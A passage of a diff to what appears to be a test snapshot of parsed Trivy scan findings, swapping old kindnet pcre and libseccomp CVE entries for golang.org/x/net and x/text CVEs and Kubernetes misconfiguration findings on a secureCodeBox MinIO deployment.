"https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-12", - "packageName": "libpcre3", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugs.gentoo.org/717920", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9893", - "installedVersion": "2.3.3-4", - "packageName": "libseccomp2", + "fixedVersion": "0.3.8", + "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-32149", + "installedVersion": "v0.3.7", + "packageName": "golang.org/x/text", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", - "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", - "https://access.redhat.com/errata/RHSA-2019:3624", - "https://access.redhat.com/security/cve/CVE-2019-9893", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", - "https://github.com/seccomp/libseccomp/issues/139", - "https://linux.oracle.com/cve/CVE-2019-9893.html", - "https://linux.oracle.com/errata/ELSA-2019-3624.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", - "https://seclists.org/oss-sec/2019/q1/179", - "https://security.gentoo.org/glsa/201904-18", - "https://ubuntu.com/security/notices/USN-4001-1", - "https://ubuntu.com/security/notices/USN-4001-2", - "https://usn.ubuntu.com/4001-1/", - "https://usn.ubuntu.com/4001-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-9893", - "https://www.openwall.com/lists/oss-security/2019/03/15/1", + "https://access.redhat.com/security/cve/CVE-2022-32149", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "https://github.com/golang/go/issues/56152", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "https://go.dev/cl/442235", + "https://go.dev/issue/56152", + "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "https://pkg.go.dev/vuln/GO-2022-1059", + "https://ubuntu.com/security/notices/USN-5873-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32149", ], }, "category": "Vulnerability", - "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libseccomp: incorrect generation of syscall filters in libseccomp", + "name": "ParseAcceptLanguage takes a long time to parse complex tags", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9893", + "value": "https://avd.aquasec.com/nvd/cve-2022-32149", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-32149", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", }, { "type": "URL", - "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2019:3624", + "value": "https://github.com/golang/go/issues/56152", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9893", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", }, { "type": "URL", - "value": "https://github.com/seccomp/libseccomp/issues/139", + "value": "https://go.dev/cl/442235", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", + "value": "https://go.dev/issue/56152", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", }, { "type": "URL", - "value": "https://seclists.org/oss-sec/2019/q1/179", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201904-18", + "value": "https://pkg.go.dev/vuln/GO-2022-1059", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-1", + "value": "https://ubuntu.com/security/notices/USN-5873-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4001-2", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://usn.ubuntu.com/4001-1/", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4001-2/", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'minio' of Deployment 'securecodebox-operator-minio' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, ], "severity": "LOW", @@ -140418,5036 +141544,5484 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", ], }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.cpu')", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV015", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv015", + ], + }, + "category": "Misconfiguration", + "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set 'containers[].resources.requests.cpu'.", + "name": "CPU requests not specified(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.requests.cpu')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://avd.aquasec.com/misconfig/ksv015", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'minio' of Deployment 'securecodebox-operator-minio' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-operator-minio' / 